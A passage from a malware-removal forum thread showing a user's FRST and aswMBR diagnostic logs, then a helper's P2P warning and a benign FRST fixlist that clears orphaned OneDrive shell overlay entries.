    FirewallRules: [{8E6EEA97-8D35-486D-B2B6-A2E9F8BF338C}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3109\Agent.exe
    FirewallRules: [{A3FE7E6A-1E6C-4E76-A75D-A4D1DCA0EDC0}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3109\Agent.exe
    FirewallRules: [{769BECB0-54E0-47E7-9759-ECAF2E28273D}] => (Allow) D:\Steam\SteamApps\common\Arma 3\arma3launcher.exe
    FirewallRules: [{7B0D63B9-31A4-4ADB-8F22-69D31A83D9B8}] => (Allow) D:\Steam\SteamApps\common\Arma 3\arma3launcher.exe
    FirewallRules: [{3B9FA9A3-38E7-41D2-88A1-0BB43DE029BD}] => (Allow) D:\Steam\SteamApps\common\Sid Meier's Civilization V\Launcher.exe
    FirewallRules: [{74A436A7-8819-4F18-8F60-716D8A0E357E}] => (Allow) D:\Steam\SteamApps\common\Sid Meier's Civilization V\Launcher.exe
    FirewallRules: [{48B12E80-9B0D-46D9-A92C-7D542E713519}] => (Allow) D:\Steam\SteamApps\common\BioShock Infinite\Binaries\Win32\BioShockInfinite.exe
    FirewallRules: [{B1560556-55E2-42A6-A2E3-F65F2A7A5E97}] => (Allow) D:\Steam\SteamApps\common\BioShock Infinite\Binaries\Win32\BioShockInfinite.exe
    FirewallRules: [{75F5A6EB-BD39-4FE4-A690-4ABD347FD037}] => (Allow) D:\Steam\SteamApps\common\BioShock 2\MP\Builds\Binaries\Bioshock2Launcher.exe
    FirewallRules: [{099743C1-9DF8-4750-949F-761AC80ABAC6}] => (Allow) D:\Steam\SteamApps\common\BioShock 2\MP\Builds\Binaries\Bioshock2Launcher.exe
    FirewallRules: [{9F777184-4A13-4D03-A7C0-01D49AEABDDE}] => (Allow) D:\Steam\SteamApps\common\BioShock 2\SP\Builds\Binaries\Bioshock2Launcher.exe
    FirewallRules: [{FCA495C1-8148-4FE6-A6C4-C517B16D4099}] => (Allow) D:\Steam\SteamApps\common\BioShock 2\SP\Builds\Binaries\Bioshock2Launcher.exe
    FirewallRules: [{1E57FFC8-E277-4527-A558-4E533468C4FD}] => (Allow) D:\Steam\SteamApps\common\Bioshock\Builds\Release\Bioshock.exe
    FirewallRules: [{FF7C891B-641F-403F-BDCB-015433DB2BB8}] => (Allow) D:\Steam\SteamApps\common\Bioshock\Builds\Release\Bioshock.exe
    FirewallRules: [{67B411DD-238B-4813-AF90-1F0C53336E41}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2880\Agent.exe
    FirewallRules: [{0B80C1B4-520A-43F6-A486-2689BB9F4589}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2880\Agent.exe
    FirewallRules: [{D1348AB0-4C36-4E08-AEE7-833E635A6B76}] => (Allow) D:\Steam\SteamApps\common\Contagion\contagionds.exe
    FirewallRules: [{7FC743AA-D733-419F-8042-A035AD45F3B5}] => (Allow) D:\Steam\SteamApps\common\Contagion\contagionds.exe
    FirewallRules: [{F5F95BD3-A35E-44EE-A112-E2F68B3D3A0A}] => (Allow) D:\Steam\SteamApps\common\Contagion\contagion.exe
    FirewallRules: [{112C8525-A869-473F-A5AE-968AEB8835F7}] => (Allow) D:\Steam\SteamApps\common\Contagion\contagion.exe
    FirewallRules: [{20B0CC62-3200-4EEF-B0B7-37B644402890}] => (Allow) D:\Steam\SteamApps\common\Counter-Strike Global Offensive\csgo.exe
    FirewallRules: [{EF08C331-87FB-4CC5-ACB3-8EE65B40BA62}] => (Allow) D:\Steam\SteamApps\common\Counter-Strike Global Offensive\csgo.exe
    FirewallRules: [{BF9681B5-75E6-4BB8-A9E8-33A6536FD70F}] => (Allow) D:\Steam\SteamApps\common\Arma 3\arma3.exe
    FirewallRules: [{D7D86F73-58B4-4297-BD11-31694ED9AAE0}] => (Allow) D:\Steam\SteamApps\common\Arma 3\arma3.exe
    FirewallRules: [{DD0DCF4C-E8E1-49DD-900A-DD6AC7BC5C3C}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2816\Agent.exe
    FirewallRules: [{CF01C627-5181-49F6-8E87-A4C0CBDD7CA7}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2816\Agent.exe
    FirewallRules: [{7E20D8C2-63C2-4175-95E6-1343C3ECD0C6}] => (Allow) D:\Steam\SteamApps\common\Team Fortress 2\hl2.exe
    FirewallRules: [{491A2AED-C695-4F06-BA71-CB7838E9C4FF}] => (Allow) D:\Steam\SteamApps\common\Team Fortress 2\hl2.exe
    FirewallRules: [{5E2969A1-BE68-4265-A8FC-7097A7ECBB11}] => (Allow) D:\Steam\SteamApps\common\BattleNations\bin\battlenations.exe
    FirewallRules: [{74E554AC-E08A-4335-B417-29987ADE8453}] => (Allow) D:\Steam\SteamApps\common\BattleNations\bin\battlenations.exe
    FirewallRules: [{A03CA821-5944-4FD4-AA99-63D9A7D540E2}] => (Allow) D:\Hearthstone\Hearthstone.exe
    FirewallRules: [{7D59F7B3-275B-4781-B5B3-F54F6611ABE6}] => (Allow) D:\Hearthstone\Hearthstone.exe
    FirewallRules: [{A01AFC7A-FADD-4E17-B5C6-7189DE2CD1CE}] => (Allow) D:\StarCraft II\StarCraft II.exe
    FirewallRules: [{700AEC12-F515-4E9F-AE1F-ACFE78622256}] => (Allow) D:\StarCraft II\StarCraft II.exe
    FirewallRules: [{ABA0ADF7-7B84-4F79-85B1-13F0FF4024DE}] => (Allow) D:\Diablo III\Diablo III.exe
    FirewallRules: [{6CF41658-1CD6-4500-AC43-A82F127ACABB}] => (Allow) D:\Diablo III\Diablo III.exe
    FirewallRules: [{C2481D3E-C354-4753-BD12-A8F578C331BF}] => (Allow) D:\Steam\SteamApps\common\DayZ\DayZ.exe
    FirewallRules: [{16888A73-5F47-429F-A727-2E2184704346}] => (Allow) D:\Steam\SteamApps\common\DayZ\DayZ.exe
    FirewallRules: [{7CD9AF2C-6572-4973-B88A-D6A325B74B4F}] => (Allow) D:\Steam\SteamApps\common\dota 2 beta\dota.exe
    FirewallRules: [{F9A7B398-94AE-45D6-8514-BEA802B1E5E2}] => (Allow) D:\Steam\SteamApps\common\dota 2 beta\dota.exe
    FirewallRules: [{512EF9C6-D108-459F-8832-0603753D2F89}] => (Allow) C:\Users\Kym\AppData\Roaming\uTorrent\uTorrent.exe
    FirewallRules: [{B598ABAB-0FDC-43A9-BD15-FF9FF99D712C}] => (Allow) C:\Users\Kym\AppData\Roaming\uTorrent\uTorrent.exe
    FirewallRules: [{E4955EAC-E367-495F-B0A4-89B8B7610B29}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
    FirewallRules: [{416A0B8C-2763-42F0-82EB-9269719E1BE4}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
    FirewallRules: [{15969D30-C471-468E-B2ED-1594FE384FC3}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
    FirewallRules: [{08FE19D4-7434-48EA-A27A-93ED53D7717A}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
    FirewallRules: [{933A444B-2C3D-45AC-80E9-EFE8EB8DAD9D}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
    FirewallRules: [{EF266A5B-42EB-4853-A982-4DED1ADF6F73}] => (Allow) C:\Program Files (x86)\Battle.net\Battle.net.exe
    FirewallRules: [{BC4FFE1F-5AF4-4233-8E52-5094D6FE9F07}] => (Allow) C:\Program Files (x86)\Battle.net\Battle.net.exe
    FirewallRules: [{31F097A5-8E00-4169-A16D-1C9A71721FA1}] => (Allow) D:\Steam\Steam.exe
    FirewallRules: [{F5C42520-0135-45B4-8FB0-5BD9692C80EE}] => (Allow) D:\Steam\Steam.exe
    FirewallRules: [TCP Query User{3D2AB9FC-2A79-4098-9681-6706A621D53F}C:\program files\logitech gaming software\lcore.exe] => (Allow) C:\program files\logitech gaming software\lcore.exe
    FirewallRules: [UDP Query User{09124E07-AE4B-4C80-A7E2-E96A37034496}C:\program files\logitech gaming software\lcore.exe] => (Allow) C:\program files\logitech gaming software\lcore.exe
    FirewallRules: [{923D26F5-A4EE-433D-BE2B-5CE473180539}] => (Allow) C:\Program Files\AVAST Software\Avast\ng\vbox\aswFe.exe
    FirewallRules: [{E6F2E9A0-F842-4541-8D31-CE38FDD09EDE}] => (Allow) C:\Program Files\AVAST Software\Avast\ng\vbox\aswFe.exe
    FirewallRules: [{F906BBDC-3C41-494C-A264-2234D81FEF3E}] => (Block) D:\Program Files\Adobe\Adobe Premiere Elements 2011\Adobe Premiere Elements 11\Adobe Premiere Elements.exe
    FirewallRules: [{BD0F045D-D2C0-41A7-8024-69C5F302A95F}] => (Allow) D:\Steam\SteamApps\common\dota 2 beta\game\bin\win64\dota2.exe
    FirewallRules: [{7710A3C2-777C-4F45-BA7E-19121D633EB3}] => (Allow) D:\Steam\SteamApps\common\dota 2 beta\game\bin\win64\dota2.exe
    FirewallRules: [{7172F858-7B10-43BC-B718-09A53F078F3C}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
    FirewallRules: [{6B94AB4E-EBC9-430B-A32F-B62386B68D88}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
    FirewallRules: [{F70F4B42-49F1-4B1A-B8A8-FCF794C81494}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
    FirewallRules: [{045729B0-69AA-489E-BE8C-C51AC1A7B953}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
    FirewallRules: [{92708362-07EC-40D9-A2DB-B96340F268FB}] => (Allow) C:\Program Files\iTunes\iTunes.exe
    FirewallRules: [{4B096532-9213-4604-8B21-D8BCE26411CE}] => (Allow) C:\Program Files (x86)\Remote Mouse\RemoteMouse.exe
    FirewallRules: [{0104B469-8DD7-41D2-9979-185C8C113A44}] => (Allow) C:\Program Files (x86)\Remote Mouse\RemoteMouse.exe
    FirewallRules: [{83A03678-B554-4993-9E39-0C22F10E135B}] => (Allow) D:\SPSS\stats.com
    FirewallRules: [{091CE1FB-5C3F-4138-8341-49FEB2CFD24B}] => (Allow) D:\SPSS\stats.exe
    FirewallRules: [{9576161E-2723-4775-B358-84BB54C518DA}] => (Allow) D:\SPSS\stats.com
    FirewallRules: [{5CABC212-DC4A-4B5F-A0FE-532EA8330453}] => (Allow) D:\SPSS\stats.exe
    FirewallRules: [{394EAA14-7FAC-47B7-B3D9-7B4756AB1A7B}] => (Allow) D:\SPSS\WinWrapIDE.exe
    FirewallRules: [{16A7A8A5-316D-425F-870E-5896D1CE4C33}] => (Allow) D:\SPSS\WinWrapIDE.exe
    FirewallRules: [{79364F63-7C39-456E-AB8F-8757D05D824C}] => (Allow) D:\Steam\SteamApps\common\GarrysMod\hl2.exe
    FirewallRules: [{54FF873C-F71A-4CCF-8775-0C1D01F98DE2}] => (Allow) D:\Steam\SteamApps\common\GarrysMod\hl2.exe
    FirewallRules: [{3B43C12B-BCDF-45BF-B840-0535E1E51BB0}] => (Allow) D:\Ubisoft Game Launcher\games\Rainbow Six Siege - Open Beta\RainbowSix.exe
    FirewallRules: [{E52DF45C-B750-4C08-A94D-1C9E5FD0C9E0}] => (Allow) D:\Ubisoft Game Launcher\games\Rainbow Six Siege - Open Beta\RainbowSix.exe
    FirewallRules: [TCP Query User{5FA1C1D8-35DC-4C59-B59E-E79663992D79}C:\program files (x86)\remote mouse\remotemouse.exe] => (Allow) C:\program files (x86)\remote mouse\remotemouse.exe
    FirewallRules: [UDP Query User{B382372C-70E0-4294-8918-424DD03F9B35}C:\program files (x86)\remote mouse\remotemouse.exe] => (Allow) C:\program files (x86)\remote mouse\remotemouse.exe
    FirewallRules: [{779D02B6-A237-497E-8EA6-A0FE4181802E}] => (Allow) D:\Steam\SteamApps\common\Clicker Heroes\Clicker Heroes.exe
    FirewallRules: [{8F8BCB79-A539-484F-91B1-F34943ED9B63}] => (Allow) D:\Steam\SteamApps\common\Clicker Heroes\Clicker Heroes.exe
    FirewallRules: [{FA6B12F6-052C-4390-B321-7E5ED5365770}] => (Allow) D:\Steam\SteamApps\common\Tom Clancy's Rainbow Six Siege\RainbowSix.exe
    FirewallRules: [{FD71A44F-D3A8-4A46-B9B5-A3FFF96D2B7A}] => (Allow) D:\Steam\SteamApps\common\Tom Clancy's Rainbow Six Siege\RainbowSix.exe
    FirewallRules: [{3E390A03-0EC6-460A-AFF8-07A3B3CE42A7}] => (Allow) C:\Program Files (x86)\Raptr\raptr.exe
    FirewallRules: [{F56F3DD1-6F01-4E52-AF5A-050CF4A4240E}] => (Allow) C:\Program Files (x86)\Raptr\raptr.exe
    FirewallRules: [{133D51D8-9D57-49D0-A255-8F344FBE942D}] => (Allow) C:\Program Files (x86)\Raptr\raptr_im.exe
    FirewallRules: [{7EFE47F1-0DAB-47F3-BB87-FB89C0045DAF}] => (Allow) C:\Program Files (x86)\Raptr\raptr_im.exe
    FirewallRules: [{3D3C4B45-00E1-45D2-A21E-63FFE437D631}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe] => Enabled:Spybot - Search & Destroy tray access
    StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe] => Enabled:Spybot-S&D 2 Scanner Service
    StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe] => Enabled:Spybot-S&D 2 Updater
    StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe] => Enabled:Spybot-S&D 2 Background update service

    ==================== Restore Points =========================

    12-02-2016 19:34:43 Windows Update
    15-02-2016 13:41:32 Windows Backup
    18-02-2016 15:21:16 Windows Update
    21-02-2016 16:50:40 Windows Update
    21-02-2016 19:00:07 Windows Backup
    28-02-2016 19:00:09 Windows Backup

    ==================== Faulty Device Manager Devices =============


    ==================== Event log errors: =========================

    Application errors:
    ==================
    Error: (02/29/2016 08:34:29 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: KYM-PC)
    Description: Activation of app Microsoft.XboxApp_8wekyb3d8bbwe!Microsoft.XboxApp failed with error: -2147009284 See the Microsoft-Windows-TWinUI/Operational log for additional information.

    Error: (02/29/2016 08:34:29 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: KYM-PC)
    Description: Activation of app Microsoft.WindowsAlarms_8wekyb3d8bbwe!App failed with error: -2147009284 See the Microsoft-Windows-TWinUI/Operational log for additional information.

    Error: (02/29/2016 08:32:37 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: KYM-PC)
    Description: Activation of app Microsoft.WindowsAlarms_8wekyb3d8bbwe!App failed with error: -2147009284 See the Microsoft-Windows-TWinUI/Operational log for additional information.

    Error: (02/29/2016 08:31:37 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: KYM-PC)
    Description: Activation of app Microsoft.Getstarted_2.6.12.0_x64__8wekyb3d8bbwe:App.AppX7mv0s3r0wanj0n66dy6vax24ps6avzvz.mca failed with error: -2144927149 See the Microsoft-Windows-TWinUI/Operational log for additional information.

    Error: (02/29/2016 08:31:37 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: KYM-PC)
    Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2147023170 See the Microsoft-Windows-TWinUI/Operational log for additional information.

    Error: (02/29/2016 08:31:36 PM) (Source: Application Error) (EventID: 1000) (User: )
    Description: Faulting application name: SearchUI.exe, version: 10.0.10240.16603, time stamp: 0x5655390b
    Faulting module name: CortanaApi.dll, version: 0.0.0.0, time stamp: 0x56553724
    Exception code: 0x80000003
    Fault offset: 0x0000000000151c4f
    Faulting process id: 0x6e4
    Faulting application start time: 0xSearchUI.exe0
    Faulting application path: SearchUI.exe1
    Faulting module path: SearchUI.exe2
    Report Id: SearchUI.exe3
    Faulting package full name: SearchUI.exe4
    Faulting package-relative application ID: SearchUI.exe5

    Error: (02/29/2016 08:30:18 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: KYM-PC)
    Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2147023170 See the Microsoft-Windows-TWinUI/Operational log for additional information.

    Error: (02/29/2016 08:30:18 PM) (Source: Application Error) (EventID: 1000) (User: )
    Description: Faulting application name: SearchUI.exe, version: 10.0.10240.16603, time stamp: 0x5655390b
    Faulting module name: CortanaApi.dll, version: 0.0.0.0, time stamp: 0x56553724
    Exception code: 0x80000003
    Fault offset: 0x0000000000151c4f
    Faulting process id: 0xab4
    Faulting application start time: 0xSearchUI.exe0
    Faulting application path: SearchUI.exe1
    Faulting module path: SearchUI.exe2
    Report Id: SearchUI.exe3
    Faulting package full name: SearchUI.exe4
    Faulting package-relative application ID: SearchUI.exe5

    Error: (02/29/2016 08:30:17 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: KYM-PC)
    Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2147023170 See the Microsoft-Windows-TWinUI/Operational log for additional information.

    Error: (02/29/2016 08:30:17 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: KYM-PC)
    Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2147023170 See the Microsoft-Windows-TWinUI/Operational log for additional information.


    System errors:
    =============
    Error: (02/29/2016 08:35:26 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
    Description: Installation Failure: Windows failed to install the following update with error 0x80073cf9: Windows Alarms & Clock.

    Error: (02/29/2016 08:35:26 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
    Description: Installation Failure: Windows failed to install the following update with error 0x80070490: Windows Alarms & Clock.

    Error: (02/29/2016 08:35:20 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
    Description: Installation Failure: Windows failed to install the following update with error 0x80073cf9: Windows Alarms & Clock.

    Error: (02/29/2016 08:35:20 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
    Description: Installation Failure: Windows failed to install the following update with error 0x80070490: Windows Alarms & Clock.

    Error: (02/29/2016 08:34:28 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
    Description: The Intel(R) Management and Security Application Local Management Service service failed to start due to the following error:
    %%2

    Error: (02/29/2016 08:34:28 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
    Description: The Intel(R) Dynamic Application Loader Host Interface Service service failed to start due to the following error:
    %%2

    Error: (02/29/2016 08:32:23 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
    Description: The Net.Tcp Listener Adapter service depends on the Net.Tcp Port Sharing Service service which failed to start because of the following error:
    %%1058

    Error: (02/29/2016 08:32:23 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
    Description: The LogMeIn Hamachi Tunneling Engine service failed to start due to the following error:
    %%2

    Error: (02/29/2016 08:31:47 PM) (Source: DCOM) (EventID: 10005) (User: KYM-PC)
    Description: 1084WSearchUnavailable{7D096C5F-AC08-4F1F-BEB7-5C22C517CE39}

    Error: (02/29/2016 08:31:47 PM) (Source: DCOM) (EventID: 10005) (User: KYM-PC)
    Description: 1084WSearchUnavailable{7D096C5F-AC08-4F1F-BEB7-5C22C517CE39}


    CodeIntegrity:
    ===================================
    Date: 2016-02-13 23:54:36.285
    Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\Microsoft.StdFormat\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.StdFormat.dll that did not meet the Microsoft signing level requirements.

    Date: 2016-02-13 23:54:36.256
    Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\ADODB\7.0.3300.0__b03f5f7f11d50a3a\ADODB.dll that did not meet the Microsoft signing level requirements.

    Date: 2016-02-13 23:54:36.214
    Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\MSDATASRC\7.0.3300.0__b03f5f7f11d50a3a\MSDATASRC.dll that did not meet the Microsoft signing level requirements.

    Date: 2016-02-13 23:54:36.157
    Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\Microsoft.StdFormat\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.StdFormat.dll that did not meet the Microsoft signing level requirements.

    Date: 2016-02-13 23:54:36.135
    Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\ADODB\7.0.3300.0__b03f5f7f11d50a3a\ADODB.dll that did not meet the Microsoft signing level requirements.

    Date: 2016-02-13 23:54:36.113
    Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\MSDATASRC\7.0.3300.0__b03f5f7f11d50a3a\MSDATASRC.dll that did not meet the Microsoft signing level requirements.

    Date: 2016-02-13 23:54:35.470
    Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\stdole\7.0.3300.0__b03f5f7f11d50a3a\stdole.dll that did not meet the Microsoft signing level requirements.

    Date: 2016-02-13 23:54:35.328
    Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\stdole\7.0.3300.0__b03f5f7f11d50a3a\stdole.dll that did not meet the Microsoft signing level requirements.

    Date: 2016-02-13 23:51:19.676
    Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\Microsoft.StdFormat\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.StdFormat.dll that did not meet the Microsoft signing level requirements.

    Date: 2016-02-13 23:51:19.646
    Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\ADODB\7.0.3300.0__b03f5f7f11d50a3a\ADODB.dll that did not meet the Microsoft signing level requirements.


    ==================== Memory info ===========================

    Processor: Intel(R) Core(TM) i5-4670K CPU @ 3.40GHz
    Percentage of memory in use: 16%
    Total physical RAM: 16271.13 MB
    Available physical RAM: 13512.53 MB
    Total Virtual: 32655.13 MB
    Available Virtual: 29616.68 MB

    ==================== Drives ================================

    Drive c: () (Fixed) (Total:111.69 GB) (Free:13.97 GB) NTFS ==>[drive with boot components (obtained from BCD)]
    Drive d: (New Volume) (Fixed) (Total:931.41 GB) (Free:512.93 GB) NTFS
    Drive f: (Seagate Expansion Drive) (Fixed) (Total:1863.02 GB) (Free:333.52 GB) NTFS

    ==================== MBR & Partition Table ==================

    ========================================================
    Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 4E0A8E17)
    Partition 1: (Not Active) - (Size=931.4 GB) - (Type=07 NTFS)

    ========================================================
    Disk: 1 (MBR Code: Windows 7 or 8) (Size: 111.8 GB) (Disk ID: 4B95E549)
    Partition 1: (Active) - (Size=111.7 GB) - (Type=07 NTFS)

    ========================================================
    Disk: 2 (Size: 1863 GB) (Disk ID: 908BDE7D)
    Partition 1: (Not Active) - (Size=1863 GB) - (Type=07 NTFS)

    ==================== End of Addition.txt ============================

    aswMBR version 1.0.1.2252 Copyright(c) 2014 AVAST Software
    Run date: 2016-02-29 20:47:33
    -----------------------------
    20:47:33.992 OS Version: Windows x64 6.2.9200
    20:47:33.992 Number of processors: 4 586 0x3C03
    20:47:33.992 ComputerName: KYM-PC UserName: Kym
    20:47:34.235 Initialize success
    20:47:34.242 VM: initialized successfully
    20:47:34.243 VM: Intel CPU supported virtualized
    20:47:43.424 VM: disk I/O iaStorA.sys
    20:47:45.547 AVAST engine defs: 16022900
    20:47:52.042 Disk 0 \Device\Harddisk0\DR0 -> \Device\0000002f
    20:47:52.043 Disk 0 Vendor: WDC_WD10EZRX-00A8LB0 01.01A01 Size: 953869MB BusType: 11
    20:47:52.046 Disk 1 (boot) \Device\Harddisk1\DR1 -> \Device\00000030
    20:47:52.047 Disk 1 Vendor: Samsung_SSD_840_EVO_120GB EXT0BB6Q Size: 114473MB BusType: 11
    20:47:52.054 Disk 1 MBR read successfully
    20:47:52.056 Disk 1 MBR scan
    20:47:52.058 Disk 1 Windows 7 default MBR code
    20:47:52.060 Disk 1 Partition 1 80 (A) 07 HPFS/NTFS NTFS 114371 MB offset 206848
    20:47:52.066 Disk 1 scanning C:\WINDOWS\system32\drivers
    20:47:52.741 Service scanning
    20:47:55.885 Modules scanning
    20:47:55.904 Disk 1 trace - called modules:
    20:47:55.923 ntoskrnl.exe CLASSPNP.SYS disk.sys ACPI.sys storport.sys hal.dll iaStorA.sys
    20:47:55.931 1 nt!IofCallDriver -> \Device\Harddisk1\DR1[0xffffe0019a1e4060]
    20:47:55.936 3 CLASSPNP.SYS[fffff8004bcb46c5] -> nt!IofCallDriver -> [0xffffe00199b88970]
    20:47:55.942 5 ACPI.sys[fffff8004ae21361] -> nt!IofCallDriver -> [0xffffe00199b8e040]
    20:47:55.947 7 ACPI.sys[fffff8004ae21361] -> nt!IofCallDriver -> \Device\00000030[0xffffe00199b90060]
    20:47:56.102 AVAST engine scan C:\WINDOWS
    20:47:56.331 AVAST engine scan C:\WINDOWS\system32
    20:48:15.220 AVAST engine scan C:\WINDOWS\system32\drivers
    20:48:16.311 AVAST engine scan C:\Users\Kym
    20:49:36.627 AVAST engine scan C:\ProgramData
    20:49:55.722 Disk 1 statistics 3041260/0/0 @ 20.88 MB/s
    20:49:55.726 Scan finished successfully
    20:50:05.349 Disk 1 MBR has been saved successfully to "C:\Users\Kym\Desktop\MBR.dat"
    20:50:05.352 The log file has been saved successfully to "C:\Users\Kym\Desktop\aswMBR.txt"

  4. #4
    Junior Member
    Join Date
    Feb 2016
    Posts
    11

    Post Registry Backup

    I have also backed up my registry

  5. #5
    Security Expert Juliet's Avatar
    Join Date
    Feb 2007
    Location
    Deep South
    Posts
    3,818

    Default

    P2P Warning

    ------------------------------
    I see you have peer-to-peer (P2P) file sharing software installed on your computer (uTorrent). I advise you avoid P2P file sharing programmes; they are a security risk which can make your computer susceptible to malware. File sharing networks are thoroughly infected and infested with malware - worms, backdoor Trojans, IRCBots, and rootkits propagate via P2P file sharing networks, gaming, and underground sites. Users visiting such pages may see innocuous-looking banner ads containing code which can trigger pop-up ads and malicious Flash ads that install viruses, Trojans, and spyware. The best way to reduce the risk of infection is to avoid these types of web sites and not use P2P applications. Please read the following articles for more information.

    Your P2P software can be removed by following the instructions below.
    • Press the Windows Key + r on your keyboard at the same time. Type appwiz.cpl and click OK.
    • Search for the aforementioned programme(s), right-click and click Uninstall.

    If you choose not to, please refrain from using the programme(s) during this process.
    ~~~~~~~~~~~~~~~~~~~~~~~~~

    Please open Notepad *Do Not Use Wordpad!* or use any other text editor than Notepad or the script will fail. (Start -> Run -> type notepad in the Open field -> OK) and copy and paste the text present inside the quote box below:
    To do this highlight the contents of the box and right click on it and select copy.
    Paste this into the open notepad. save it to the Desktop as fixlist.txt
    NOTE. It's important that both files, FRST/FRST64 and fixlist.txt are in the same location or the fix will not work.
    It needs to be saved Next to the "Farbar Recovery Scan Tool" (If asked to overwrite existing one please allow)





    start
    CreateRestorePoint:
    CloseProcesses:
    ShellIconOverlayIdentifiers: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\amd64\FileSyncShell64.dll No File
    ShellIconOverlayIdentifiers: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\amd64\FileSyncShell64.dll No File
    ShellIconOverlayIdentifiers: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\amd64\FileSyncShell64.dll No File
    ShellIconOverlayIdentifiers: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\amd64\FileSyncShell64.dll No File
    ShellIconOverlayIdentifiers: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\amd64\FileSyncShell64.dll No File
    ShellIconOverlayIdentifiers: [GDriveSharedOverlay] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D43} => No File
